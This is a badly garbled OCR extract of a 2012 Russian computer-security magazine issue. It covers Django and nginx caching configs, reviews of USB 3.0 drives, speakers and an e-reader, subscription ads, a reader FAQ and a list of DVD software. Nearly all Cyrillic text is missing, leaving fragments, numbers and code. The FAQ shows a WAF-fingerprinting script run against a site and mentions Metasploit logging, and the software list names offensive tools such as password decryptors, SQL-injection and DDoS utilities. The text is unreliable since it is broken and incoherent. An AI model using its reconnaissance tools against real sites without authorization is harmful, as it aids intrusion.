Caching APls

Memcached

In-dat abase
cached

- Django

03 /158/ 2012

Filesystem
cached

Local-m emory
cached

,
. ,
, .

.
, -.
-, .
Django
. :
. :
, , .
, ,
. .
-, , .
, .
,
127

SYN/ACK
SYN/ACK
,
,
. , , ,
- , ,
memcached.
-, . , , , .
, ,
. .
. Django :
memcached , ;
, ;
;
, .
,
VPS. , ,
.
, -.
settings.py :
# memcached
CACHE_BACKEND = 'memcached://127.0.0.1:11211/'
# ( , )
CACHE_BACKEND = 'db://_'
#
CACHE_BACKEND = 'file://///'
#
CACHE_BACKEND = 'locmem:///'
# ( )
CACHE_BACKEND = 'dummy:///'


. manage.py:
# python manage.py createcachetable _

- :
timeout (
300);
max_entries (
300);
cull_frequency ,
max_entries ( 3,
).
CGI, :
CACHE_BACKEND = "locmem:///?timeout=30&max_entries=400"


-

-
128

uWSGI



, ,
, ,
. ,
, , ,

.
Django
settings.py:
#
MIDDLEWARE_CLASSES = (
#
'django.middleware.cache.CacheMiddleware',
# middleware...
'django.middleware.cache.FetchFromCacheMiddleware',
)
# " "
CACHE_MIDDLEWARE_SECONDS='300'

.
. .
.
johnny-cache,
memcached -.
. johnny-cache Django-:
INSTALLED_APPS = (
...
'johnny',
)

middleware:
MIDDLEWARE_CLASSES = (
'johnny.middleware.LocalStoreClearMiddleware',
'johnny.middleware.QueryCacheMiddleware',
...
)

03 /158/ 2012

-- memcached
(
memcached):
CACHE_BACKEND =
'johnny.backends.memcached://127.0.0.1:11211'
JOHNNY_MIDDLEWARE_KEY_PREFIX='jc_host_com'

, !



, -.
, -
,
, , , , ,
.
, .
,


. ,
:
,
Django, -,
. , , :).
Django -

cache, :

NGINX
,
nginx. proxy_
store try_files:
location / {
root /var/www/;
try_files /cache/$uri @storage;
}
location @storage {
proxy_pass http://backend;
proxy_set_header Host $host;
proxy_store on;
proxy_store_access user:rw group:rw all:r;
proxy_temp_path /var/www/cache/;
root /var/www/cache/;
}

/var/www/cache ( tmpfs,
),
( 10 ):
$ cd /var/www/cache
$ find ./ -type f -amin +10 -delete

uWSGI Django

-, . ,

load ( ):
{% load cache %}

cache :
{% block header %}
{% cache 5000 header-cache %}
{% block logo %}
{% endblock %}
{% block menu %}
{% endblock %}
{% endcache %}
{% endblock %}

. header logo
menu, cache. , logo menu
, 5000 , .
cache , .
,
-
(,
, . .), , , .
:
{% block sidebar %}
{% cache 500 sidebar-cache request.user.username %}
...
{% endcache %}
{% endblock %}

Django- , .
.
. z

cron.

03 /158/ 2012

129

FERRUM

!

USB 3.0


, . -
( ).
,
- . , ,
,
( .
). , ,
, ,
.
, , , , -.
6 .

130


.
HD Tune Pro , HDD
. ,
, .

HDD PCMark Vantage. , ,
.
, / , ,

. , -
, , , .

03 /158/ 2012

ADATA NH13

ADATA. ADATA
NH13 750 , :
500/750 .
,
, HDD,
.
, Mini
USB 3.0.
,
,
. ,
:
USB 3.0 .
ADATA NH13 ,
.
HDD ( DVD c Windows 7),
.

3000
.

SEAGATE
STAA1500100
5000
.

03 /158/ 2012

Seagate . ,
- ,
- . , GoFlex
SATA-, SATA.
- ,
, , USB , eSATA
FireWire 800. Seagate STAA1500100 USB 3.0. , ,
.
Seagate STAA1500100
.
, 1,5
. ,

.

131

FERRUM

SILICON POWER
SP750GBPHDS20S3U
Silicon Power,
. HDD .

. ,
. Mini USB 3.0 ,
, .
750 , 500
1000 . : , ,
, Silicon Power SP640GBPHDS10S3N. -
: ,
. ,
, , , ,
.

2700
.

TRANSCEND TS1TSJ25H3P
, ,
. , ,
.
Transcend ,
,
.
, .
: USB 3.0,
. -
. ,
1 , Transcend TS1TSJ25H3P. ,
(500 750 ), , , .

3600
.

:
:
:
:
:

132

ADATA NH13

750
2,5"
USB 3.0
77 16 118
165

Silicon Power
SP750GBPHDS20S3U

Seagate STAA1500100

1,5
2,5"
USB 3.0
89 120 22
280

750
2,5"
USB 3.0
80 21 142
160

03 /158/ 2012

VERBATIM 53035

- Verbatim 53035. ,
StorenGo . , , , . ,
. , Verbatim
53035 , HDD. , ,
Mini USB 3.0. ,
1 ,
.
,
Verbatim 53035
.
:
Nero, Green Button,
. ,
.
, , .

3800
.

WESTERN DIGITAL
WDBACX0010BBK
,
. My Passport
Essential SE ,
: , , . ,
, , .
: , Mini USB 3.0
. My Passport Essential SE
, 750 .
-
, ,
2,5- HDD. 1000 , . ,
. ,
. ,
.

3500
.

AWARDS
Transcend
TS1TSJ25H3P

1
2,5"
USB 3.0
81 22 131
256

03 /158/ 2012

Verbatim 53035

1
2,5"
USB 3.0
82 20 127
185

Western
Digital WDBACX0010BBK

1
2,5"
USB 3.0
83 18 110
200

, ,
.

, ,
, . ,
, , Verbatim 53035. ,
, Silicon Power SP750GBPHDS20S3U. z

133

FERRUM

PCMARK VANTAGE,

ADATA NH13 750

ADATA NH13 750

Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U

Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U

Transcend TS1TSJ25H3P

Transcend TS1TSJ25H3P

Verbatim 53035

Verbatim 53035
Western Digital
WDBACX0010BBK

Western Digital
WDBACX0010BBK
0

00 00 00 500 000 500


0
3
2
50 10 15 20
3

0 10 15 20 25 30 35 40 45

PCMark Vantage


, , ,

PCMARK VANTAGE, /

HD TUNE PRO (WRITE), /

ADATA NH13 750

ADATA NH13 750

Seagate STAA1500100

Seagate STAA1500100

Silicon Power
SP750GBPHDS20S3U

Silicon Power
SP750GBPHDS20S3U
Transcend TS1TSJ25H3P

Transcend TS1TSJ25H3P

Verbatim 53035
Verbatim 53035

Western Digital
WDBACX0010BBK

Western Digital
WDBACX0010BBK
Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading

0 10 20 30 40 50 60 70 80

20 40 60 80 100 120 140

HD Tune Pro (Write), / .


HD Tune Pro (Write), / .
HD Tune Pro (Write), / .

- ,
.

HD TUNE PRO (READ), /

ADATA NH13 750


Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Transcend TS1TSJ25H3P
Verbatim 53035
Western Digital
WDBACX0010BBK
HD Tune Pro (Read), / .
HD Tune Pro (Read), / .
HD Tune Pro (Read), / .

20

40

60

80

100

120

140

: ,

134

03 /158/ 2012

FERRUM

:
: RMS 25 + 25
(THD + N = 10 %)
-: > 85
: < 0,05 %
: 20 ~ 20
: 700 100
: , , FM,
: 5,75 (148 ),
, 6 ,
: 1 (25 ),
, , 6
: : 318 191 x 284 ;
: 318 186 271
: RCA- (RCA-RCA RCA
AUX), FM-, SD-, USB-
: 11

4800
.

EDIFIER R2500
2.0

Edifier, 2.0
R2500 ( Studio 5)
, . , , ,
. , , ?
, Edifier R2500

. - , .
Edifier R2500 MDF
.
.
,
5,75- -
- .
. Edifier R2500
,
.
.

136

.
Edifier R2500 .
( , , FM-),
USB- SD-. Edifier
R2500 MP3 WMA.

. .
.
RCA- (RCA-RCA RCA AUX),
FM-. Edifier
R2500 .

50 , -
5,75- -.
6 .

, , .
, Edifier R2500
.
! ,
. . .
, Edifier R2500
.
, ,
.

. , ,

2.1 5.1. ,

.
, Edifier R2500, ! z

03 /158/ 2012

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

FERRUM

WEXLER.BOOK
T7055
, ,


, ,
.
,
, - .
WEXLER.BOOK T7055 , .

: ,
,
WEXLER.BOOK T7055 ,

-. !
, ,
,
,
. , , ,
, , WEXLER.BOOK T7055.
: !
, ,
, ,
,
,
. ,
.

,
.
TFT-
.
WEXLER.BOOK T7055 G-,

138

:
: , , 7, LED
: 8
: microSD, 32
: ANSI, Unicode, TXT, PDF,
HTML, PDB, EPUB, FB2, DJVU, DOC
: MP3, WMA, FLAC, AAC, WAV,
OGG
: JPG, BMP, GIF
: WMV, RM, AVI, RMVB, 3GP, FLV,
MP4, DAT, VOB, MPG, MPEG, MKV, MOV
: FM-
: 190 x 125 x 11,5
: 315


+
+

3500
.

,
.


,
microSD 32 .
, , ,
,
. FM-
.

, WEXLER.
BOOK T7055 .
.
.
.
,

.
microSD
. , WEXLER.
BOOK T7055 . , ,
FM-. z

02 /157/ 2012

>> coding

!
shop.glc.ru



40%

8-800-200-3-999
+7 (495) 663-82-77 ()

6 1110 .
13 1999 .

6 1110 .
13 1999 .

6 564 .
13 1105 .

6 1110 .
13 1999 .

6 810 .
13 1499 .

6 1110 .
13 1999 .

6 630 .
13 1140 .

6 895 .
13 1699 .

6 1194 .
13 2149 .

6 894 .
13 1699 .

6 775 .
13 1399 .

6 950 .
13 1699 .

6 810 .
13 1499 .



AUDI A7

NEED FOR SPEED: THE RUN







"./# .1



350.589



;8IEB?8G
4@4EB



.EEDFOR3PEED4HE2UN
.E

4OYOTA#AMRY

6 690 .
13 1249 .

UNITS / FAQ UNITED

(twtitter.com/stepah)

FAQ United

FAQ@REAL.XAKEP.RU

DROPBOX.COM.
,

?
!


4,5
- . Dropbox.com

. ,
,


.
, 500

Dropbox 500
.
Dropbox,

(bit.ly/AEhbvD). , AutoPlay (,
, )
Dropbox. Windows 7
Control Panel Hardware and Sound
Autoplay, XP
.

,
Q WAF
( -)?

! WAF
, .
,
, ,
WAF. , impervadetect (code.google.com/p/imperva-detect)

Imperva WAF:

# ./imperva-detect.sh https://www.
example.com
Testing [https://www.example.com] for
presence of application firewall --Test 0 - Good User Agent...
/ application firewall possibly present
Test 1 - Web Leech User Agent...
/ application firewall possibly present
Test 2 - E-mail Collector Robot User
/ application firewall possibly present
Test 3 - BlueCoat Proxy Manipulation
/ application firewall possibly present
Test 4 - Web Worm Blocking...
/ application firewall not detected
Test 5 - XSS Blocking...
/ application firewall possibly present
--- Tests Finished on [https://www.
example.com]
4 out of 5 tests indicate Imperva
application firewall present ---

WAFW00F
(code.google.com/p/waffit),
WAF.
, SVN.


,
,
MAC-?


! MAC-

Google
Location Services (samy.pl/mapxss) Skyhook
(www.skyhookwireless.com). ,

. ,
MAC-,

,
. ,

,
Google
,

Wi-Fi.

- 15
-

.
HTML5.

. ,
UI-.

140

Twitter
UI Bootstrap (twitter.github.
com/bootstrap). ( )


( IE7).

.
, , .
Bootstrap
,
. Bootstrap ,
940-.

03 /158/ 2012

FAQ UNITED

? ,

?

.

Binwalk (code.google.
com/p/binwalk).

,

.
, , firmware,
Linux, , . .


-.

- .
.
,


. ?



MYSQL?

Comet.
, Comet
,

( )
.

- : Comet
-
(bit.ly/yZ7OtH). Comet-, -

,
show processlist.
processlist
information_schema,
SQL-:

mysql -u root -p -BNe "select


host,count(host) from processlist
group by host;" information_schema

Dklab_Realplexor (dklab.ru/lib/
dklab_realplexor) Socket.IO (socket.
io). Dklab_Realplexor
,
(
PHP Python), Socket.
IO LEGO
mindshtorms
API
.
Comet-
push-,
-
, .
: Pusher (pusher.Comet), Pubnub
(www.pubnub.com), Partcl (code.google.
com/p/partcl), BeaconPush (beaconpush.
com), X-Stream.ly (x-stream.ly) ioBridge
(iobridge.com).
(bit.
ly/yLJcqm).


MSF?

Metasploit Framework
,
,

. ,

<Ctrl + C>,

. ,
MSF , ,
, ,
,
.

. ! - , !
MSF



, Twitter.
, , . ,
Bootstrap.
.

03 /158/ 2012

Pusher -,

Bootstrap ,
jQuery-. ,

, .
12
jQuery-,
, ..

BootStrap
,
, ,

, .
,
, -, . .

141

UNITS / FAQ UNITED


spool /root/owned_info.txt.
/root/owned_info.txt MSF .
, , spool (
). , , .

spool off.
-.
Q -

,
. GREP
:).

glogg (glogg.
bonnefon.org).

--- .
,
grep less.

-
WINDOWS,
. -

, ,
?

,
. ,

, :

.
Windows Event Viewer Plus
(http://bit.ly/znh9fS) Windows 8 Log Collector
(http://bit.ly/wyDI0m).

,

.

,

.



.
-,
. -

?

,
SMS;
;
, Android API;
broadcast-;
SMS .
Windows- . ,
.
.
?

USB-,

.
,
X Y
.
Arduino.
webaff (bit.ly/zNDkpD).

, ,
-,
, -,
.
Knas Restarter (www.
knas.se). , , , Knas
Restarter ,
.
.


,


,
.
?

.

,
,

,
. ,

?

Android! DroidBox
(code.google.com/p/droidbox),
.
:
;
/ ;
;
, DexClassLoader;


Evalaze (www.
evalaze.de). ?
.
.

, ,

!


.

-

,
GOOGLE DOCS,
?

Joukuu
(www.joukuu.com). Joukuu
(
Dropbox, Google Docs Box.net),
- ,
. ,
Google Docs Microsoft Office
,

Google. z

Windows-

142

03 /158/ 2012

>Net
Alpine 2.0
AthTek NetWalk Home Edition
Bluetooth Stack Switcher 1.1
DreamMail 4.6.9.0
eToolz 3.4.8
FTP Scheduler
MetroTwit
NeoDownloader 2.9
RaidCall 6.0.8
RealVNC 4.1

>Multimedia
Caesium 1.4.1
Color Desker
Free Audio Editor 2011
Free Video Dub 2.0.3
ImageGlass 1.4
IOGraph 0.9
Joukuu 1.1.5
KooBits 4.0
Little Piano 1.0.1
Motion Man
MuseScore 1.1
MusicBee 1.3.4334
Scan Tailor 0.9.11
Stealth Player 1.0
view3dscene 3.11.0
Windows 7 Logon Screen
Tweaker 1.5

>Misc
Apple Wireless Keyboard
Autosensitivity 1.4
BabyPDF 1.0
Ditto 3.18.24
Duplicate Commander 2.2
ISO Workshop 2.1
Lion UX Pack 1.0
MadAppLauncher 1.1
NexusFile 5.3.1
Pokki
Process Blocker 0.7 beta
RED 2.2
TaggedFrog 1.1
UndoClose 1.1
Volume Concierge

>>WINDOWS
>Development
ASMTool 1.3.1BETA
BinVis
Box2DFlash 2.1a
FlashDevelop 4.0.1
Geany 0.21
haXe 2.08
LINQPad 4.31
MongoDB 2.0.2
PluThon 2.0.0
ReSharper 6.1
Selenium IDE 1.6.0
SQLite 3.7.10
Unique 0.25
Visual Paradigm for UML 8.3
Community Edition
WebStorm 3.0.1
Zend Studio 9

>>UNIX
>Desktop
Asunder 2.1
Cinnamon 1.1.3
Clementine 1.0.0
Converseen 0.4.8
Echinus 0.4.9
Eina 0.14.0
Hugin 2011.4.0

>System
Auslogics Disk Defrag 3.3.0.2
DataGrab 1.2.3
Defraggler 2.09.391
DFIncBackup 2.98
Evalaze 1.1
History Viewer 4.8
Knas Restarter 2.0
MyDefrag 4.3.1
P-Apps 1.0
Puran Defrag 7.3
Speed Up Shutdown
UltraDefrag 5.0.2
USB Image Tool 1.58
Windows 8 Log Collector 1.0.0.6

>Security
Anti-Reversing Framework v1.1
BSQL Hacker 0.9.0.9
Chrome Password Decryptor 3.5
CodeReload
DAVTest 1.0
DbgCb
Deblaze 0.3
DroidBox
ExploitMyUnion 2.1
Fiddler 2.3.8.5
FindBugs 2.0.0
FiveBelow
grinder
Hexjector 1.0.7.4
HstEx 3.7
JavaSnoop 1.1
loadbalancer-finder 0.5.1
loadbalancer-finder v0.5.1
Mandiant Redline 1.0.3
RainbowCrack 1.5
Redline 1.0.3
RIPS 0.51
Scrapy 0.14
Scylla Imports Reconstruction
0.5a
Sessionthief
Sikuli-X 1.0rc3
SnD Reverser Tool 1.4
sslyze 0.3
VERA 0.3
WinTaylor 2.5.1

SecurityKiss 0.2.2
Seesmic 0.8.1
ST Proxy Switcher
streamWriter 3.6
TunnelBear
TweetDeck
WeFi 4.0.1.0

>Security
binwalk v0.4.1
BoNeSi 0.2.0
crackerpassword 1.2.1
DroidBox
FindBugs 2.0.0
Fwknop Port Knocking Utility
2.0rc5
grinder
ipt_pkd 1.10
LFI Fuzzploit Tool
loadbalancer-finder v0.5.1
NETZOB 0.3.1

>Net
Blogilo 1.0
EiskaltDC++ 2.2.5
Firefox 9.0.1
FreeRDP 1.0.0
LAN Messenger 1.2.16
LeechCraf 0.4.95-578
Masqmail 0.3.4
NTM 1.3.1
ownCloud 2.0.1
PirateWall 0.2.1
pyLoad 0.4.9
QupZilla 1.1.0
RSSOwl 2.1.2
SquidAnalyzer 4.2
Super Flexible File Synchronizer
5.61
Tixati 1.82
Window Switch 0.12.9
ZMail 0.7

>Devel
ART 0.9.01
Controlled Vars 1.3.1
Eric 5.1.8
Freeglut 2.8.0
FreePascal 2.6.0
Gambas3 3.0.0
GNU Octave 3.6.0
GTK 3.3.10
Jython 2.5.2
LatencyTOP 0.5
libircclient 1.6
mxGraph 1.9.0.2
NetBeans 7.1
PHP 5.3.9
ProjectOr RIA 1.9.1
Reportico 2.3.1
Rudiments 0.35
Ultimix 1.5.177
wxPython 2.9.3.1

ISO Master 1.3.9


LibreCAD 1.0.0
LibreOffice 3.4.5
Rhythmbox 2.95
RunLens 0.02
Scribus 1.4.0
slowmoVideo 0.2.5
SMPlayer 0.6.10
SyncWall 1.1.0
tvpvrd 3.3.4
Xine-lib 1.2.0

>>MAC
Adium 1.4.4
birthdayBook 6.0.6
Boxer 1.2.1
Cappuccino 1.11
fp 5.1
iFileX 1.1.1
iTweaX 3.0.2
LimeChat 2.30
MediaTube 1.0
Permanent Eraser 2.5.3
Praat 5.3.04
Raidcall 2.0
ShadowKiller 1.3
Skim 1.3.19
Sonora
SpeedTao beta1
TftpServer 3.4.1
Tunnelblick 3.2.3

>X-distr
PC-BSD 9.0

>System
Calculate-assemble 2.2.27
Coreutils 8.15
fstransform 0.3.7
Ipt-netflow 1.7.1
LCMC 1.2.0
Linux 3.2.2
Loadbars 0.4.0
oobash 0.39.1
OpenNebula 3.2.0
OpenNMS 1.8.17-1
Parallel 20120122
Raider 0.9.2
rxvt-unicode 9.15
systemd v38
Usermin 1.580

>Server
Apache 2.2.21
Asterisk 10.1.0
BIND 9.8.1-p1
CUPS 1.5.0
Dhcp 4.2.3-p2
Dovecot 2.0.17
FreeRADIUS 2.1.12
lighttpd 1.4.30
MySQL 5.5.20
NSD 3.2.9
OpenLDAP 2.4.28
OpenVPN 2.2.2
Postfix 2.8.7
PostgreSQL 9.1.2

OpenSSL 1.0.0g
RainbowCrack 1.5
Scapy 2.1.0
Scrapy 0.14
Social Engineer Toolkit v2.5
Spamdyke 4.3.1
Sshguard 1.5
sslyze 0.3
Stegnate 0.0.1
xca 0.9.1

03(158) 2012

UNITS / WWW2

WWW2
IFTTT
ifttt.com
IFTTT: if this, then that
, . ,
-: Gmail, Dropbox, Evernote, Instapaper, Facebook,
Twitter, Instagram, Foursquare . , : Facebook, . :
, SMS. -
, . Gmail
- , Evernote. RSS, e-mail. .
-

DUCKDUCKGO

duckduckgo.com
, . 2008
. -, DuckDuckGo
, . -, ,
. -, goodies, z (
..). DuckDuckGo
( , ).

nazamok.com
, .
. JavaScript IFrame . . , , -
.
,
nazamok.com. , -
150 ,
. , e-mail.

www.hacking-lab.com
.
, , . .
OWASP Hacking-Lab.
( LiveCD VirtualBox), VPN- , . ,
, . .

144

03 /158/ 2012